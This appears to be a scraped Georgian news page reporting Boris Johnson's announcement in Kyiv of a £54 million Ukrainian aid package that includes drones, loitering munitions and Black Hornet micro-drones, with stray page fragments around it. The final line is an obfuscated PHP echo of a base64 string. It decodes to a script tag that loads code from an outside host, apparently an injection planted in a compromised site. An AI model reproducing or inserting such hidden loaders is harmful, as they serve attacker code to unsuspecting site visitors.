celsiusi
ავერსი საქკაბელი
დიდი ბრიტანეთის პრემიერმინისტრის ბორის ჯონსონის განცხადებით, ქვეყანა უკრაინას $66 მილიონი ღირებულების (54 მილიონი ფუნტი) დახმარების პაკეტს გადასცემს. ჯონსონმა ამის შესახებ კიევში ვიზიტისას განაცხადა.
 
დაუნინგ სტრიტის მიერ გავრცელებული განცხადების თანახმად, დახმარების ახალი პაკეტი მოიცავს 2000 უახლეს დრონსა და მოძრავ საბრძოლო მასალას, რომლებიც "უკრაინას საშუალებას მისცემენ უკეთ ადევნოს თვალყური  და მიზანში ამოიღოს რუსული ძალები". 
 
გარდა ამისა, დახმარების პაკეტში შედის 850 Black Hornet მიკრო-დრონი.
 
ჯონსონი კიევში უკრაინის დამოუკიდებლობის დღესთან დაკავშირებით დღეს ჩავიდა.
468
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");